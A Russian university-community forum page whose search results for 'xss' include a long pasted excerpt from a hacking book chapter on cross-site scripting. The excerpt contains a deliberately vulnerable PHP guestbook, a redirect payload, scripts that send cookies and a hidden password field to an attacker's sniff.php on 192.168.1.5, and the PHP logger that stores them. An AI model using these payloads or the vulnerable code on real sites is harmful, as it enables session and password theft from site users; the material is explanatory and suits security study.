Летопись МИФИ

Против жуликов и воров


ЕГЭ-2024
Тесты ЕГЭ Онлайн
Задачи ЕГЭ по математике
Решения ЕГЭ по математике

Вступительные экзамены и специальности
Фишки для Корума:
Рейтинг пользователей Корума
Настроение • Модераторы
Темы • Картина дня • Realtime
Прочие фишки:
Нецензурная брань
Народная орфография
Морзянка онлайн • Калькулятор
Анаграммы • Игра в города

Загрузка календаря

Новые записи

20.05Задача про фермера и его кредит
26.01Актуализация сервисов ЕГЭ по математике 2014 года
05.11Поломалось
28.08Смена парадигмы
18.07Как вести себя в приличном обществе, предварительно обмочив штаны
оглавление »

Лучшие записи

1.Математическое порно1563
2.Ответы ко всем задачам ЕГЭ по математике 2010 года793
3.Тесты ЕГЭ Онлайн515
4.Результаты ЕГЭ по математике368
5.Результаты ЕГЭ по русскому языку268

О чем тут?

NX VBAB Webometrics igjhs А1-08 Абитуриенты Бачинский ВКонтакте Ващенифтему Волга Диплом Дрессировка преподов Дума ЕГЭ Жизнь Забабахал Инновации История Кафедра 26 Кларк Корум Лженаука МИФИ МИФИсты Морзянка НИЯУ Нанотехнологии Наука Образование Омоймоск ПЦ Поздравляю Поиск Президент Преподы Приколы Программное обеспечение Рейтинги Русский язык Сессия Смерть Статистика Стихи Сувениринг Тест Учеба Учебные материалы ФЯУ Физтех Фотки Ядерщики матанализ

Комментарии

День памяти
  20 мая 2023 (мифи умер)

Задача про фермера и его кредит
  20 мая 2023 (Алекс)

Математическое порно
  22 марта 2023 (Angleton)

Российский Союз ректоров
  19 февраля 2023 (Hellen Paul )

В помощь юному радисту: Морзянка 1.0
  13 ноября 2022 (Сергей)

Знахари и шаманы в МГТУ имени Баумана
  5 ноября 2021 (монах из кельи)

Зачет по инженерной графике
  24 августа 2020 (Инженерная графика)

Пасынки Вселенной
  18 февраля 2020 (Max Brown)

Финансовая пирамида за 10 рублей
  7 февраля 2020 (Флора Миллс)

База решений задач ЕГЭ по математике
  26 декабря 2019 (Мария)

$kib@t®onЪ
Сейчас на скибатроне
Шедевры
Я ищу слово,  «» 

а б в г д е ё ж з и й к л м н о п р с т у ф х ц ч ш щ ъ ы ь э ю я
a b c d e f g h i j k l m n o p q r s t u v w x y z

Слово «xss»
впервые сказано пользователем satanic student 03.06.2006 в 00:35,
и с тех пор употреблялось 9 раз.
СообщенияПользователиПользователи (top10)

Сообщения со словом
«xss»

Запрос выполнился за 0.0029 сек.
  1. 17.07.2008, 22:11. ~Ironia~ в теме
    «XSS - атаки в комметариях»
    ... спб бхв-петербург 2007 288 с ил isbn 5-94157-913-6 xss-------------------- в последнее время очень много разговоров было о том нужны ли файлы cookies или нет да они позволяют сохранять web-сайтам информацию на компьютере пользователя и потом использовать ее для предоставления персонализированного содержимого web-страниц в главе 9 мы уже видели что одним из способов использования cookies является хранение имени пользователя и пароля для осуществления последующего автоматического входа в большинстве случаев это очень удобно но далеко не безопасно меня не волнует что web-сайты могут сохранять в таких файлах информацию о том какие web-страницы я просматривал и чем я интересуюсь эту информацию можно сохранить и без cookies меня волнует то что эти данные может увидеть хакер один из способов воровства атака xss для реализации этой атаки хакеру необходимы базовые знания языка javascript этот язык очень прост и на первый взгляд абсолютно безобиден потому что не имеет доступа к ресурсам компьютера единственное что можно делать с помощью javascript управлять браузером но для хакера этого достаточно главное внедрить свой javascript код в web-страницу а дальше уже действовать по ситуации а ситуации бывают разные их изучением мы и займемся в этой главе ---------------------10 1 основы xss------------------- опять же все примеры сценариев в этой главе будут приведены на php почему повторюсь просто я его лучше знаю но это не значит что если сценарий написан на другом языке атака будет невозможной чаще всего xss подвержены web-сайты в которых используется аутентификация посредством данных хранящихся в cookies и есть возможность сохранять данные которые в дальнейшем будут отображаться на web-странице ярким примером такого web-сайта является форум давайте рассмотрим простейший пример использования уязвимости в листинге 10 1 приведен код сценария который отображает форму для ввода имени пользователя и текста сообщения полученные данные сохраняются в базе данных и отображаются на web-странице получается классическая гостевая книга листинг 10 1 html head title xss test title head body center h3 xss test h3 center hr form name messageadd method get имя input name username size 50 br сообщение textarea cols 65 name message rows 10 wrap virtual textarea br center center input type submit value send center form hr php соединение с базой данных mysql connect localhost root wf or die he могу подключиться к web-серверу выбор базы данных mysql select db udb539 or die he могу выбрать базу данных добавляем сообщение if isset get username username get username message get message result mysql query insert into nest news values null 1 1 1 username message 1 1 1 отображаем сообщения из базы result mysql query select poster name post text from minibbtable posts if mysql num rows result 0 print table width 100 border l print tr bgcolor aalblb print td font color ffffff user font td print td font color ffffff message font td print tr tr получаем результат запроса while line mysql fetch array result mysql assoc print tr print td line poster name td print td line post text td print tr print table body html he будем сейчас обращать внимание на то что в сценарии есть еще и ошибка позволяющая реализовать sql-инъекцию ведь получаемые от пользователя данные никак не проверяются нас сейчас интересует совершенно другое итак если пользователь просто оставляет текст сообщения то никаких проблем нет а что если в текст сообщения будет встроен javascript-код он будет выполнен а это серьезная уязвимость попробуем передать в тексте сообщения или имени пользователя строку script alert this is a test script эта строка является javascript-кодом который выводит на экран диалоговое окно с сообщением this is a test рис 10 1 рис 10 1 окно браузера с сообщением пока ничего страшного не произошло но предпосылки опасности уже есть первое что может натворить хакер сделать перенаправление на свою web-страницу для этого в тексте сообщения отправим следующий javascript-код script document location href http www vr-online ru script теперь при загрузке web-страницы пользователь будет перенаправлен на web-сайт указанный хакером в данном случае www vr-online ru как это можно использовать в корыстных целях помимо того что хакер получает трафик с чужого web-сайта он еще может украсть и пароли для этого можно создать web-страницу которая будет копией одной из страниц web-сайта трафик с которого воруется лучше будет создать web-страницу регистрации и попросить пользователя ввести имя и пароль заново для правдоподобности можно добавить сообщение об ошибке как будто произошел сбой авторизации ничего не подозревающий пользователь введет данннные которые будут сохранены в базе данных хакера после этого следует перенаправить пользователя туда откуда он пришел 2 10 2 перехватываем данные итак давайте сейчас посмотрим как хакер может перехватить данные пользователя например допустим что хакер добавит на форум или гостевую книгу следующий javascript-код script document location href http 192 168 1 5 sniff php test script этот код переадресует нас на web-страницу http 192 168 1 5 sniff php а в качестве параметра для примера передается слово test сценарий sniff php это программа хакера которая просто сохраняет переданный url в каком-нибудь хранилище например в текстовом файле пример такого файла может быть следующим php f fopen snif txt а fwrite f requbst ori fclose f print ok в этом примере содержимое url сохраняется в текстовом файле snif txt в нашем случае в этот файл попадет следующая строка sniff php test пока вроде ничего страшного хакер сам себе отправил сообщение test и web-сайт пока не пострадал усложняем задачу допустим что в форме отправки сообщения есть невидимое поле passws через которое передается пароль input type hidden name passws value qwerty каждый пользователь видит свой пароль а чтобы увидеть чужой необходимо его перехватить для этого хакер может внедрить на форму следующий javascript-код script document location href- httpi 192 168 1 5 sniff php document message passw value script в этом примере файлу sniff php передается содержимое невидимого поля теперь в файле snif txt хакер будет собирать пароли добропорядочных пользователей и возможно что на удочку попадется и администратор но вероятность найти подобный сценарий стремится к нулю намного чаще пароли хранятся в cookies но и их украсть не проблема достаточно только внедрить на форму следующий код script document location href http 192 168 1 5 sniff php document cookie script благодаря тому что javascript имеет доступ к cookies мы без проблем можем отправить их своему сценарию допустим что в самом начале нашего сценария в cookies устанавливаются следующие два значения php setcookie user admin time 5184000 setcookie pass qwerty time 5184000 теперь после их перехвата в файле snif txt мы увидим следующее sniff php user admin 20pass qwerty вот так вот хакеры с помощью xss воруют пароли единственный недостаток всех примеров...
  2. 15.03.2008, 18:37. Chameleon в теме
    «Изменить адресную строку без перехода на другую страницу.»
    ... которой осуществлен переход ох уж мне эта защита он xss заставляет извращаться
  3. 05.05.2007, 22:01. Chameleon в теме
    «Что должно быть на правой стороне сайта?»
    ... cgi-bin s jpg document cookie с выполнением активной xss в браузере всех юзеров просьба при высказывании...
  4. 03.06.2006, 00:35. satanic student в теме
    «justxpl»
    попытка атаки xss

← раньше

позже →


Рейтинг блогов



 

откуда • куда • где • eureka!
Бездарно потраченное время:
105820 дней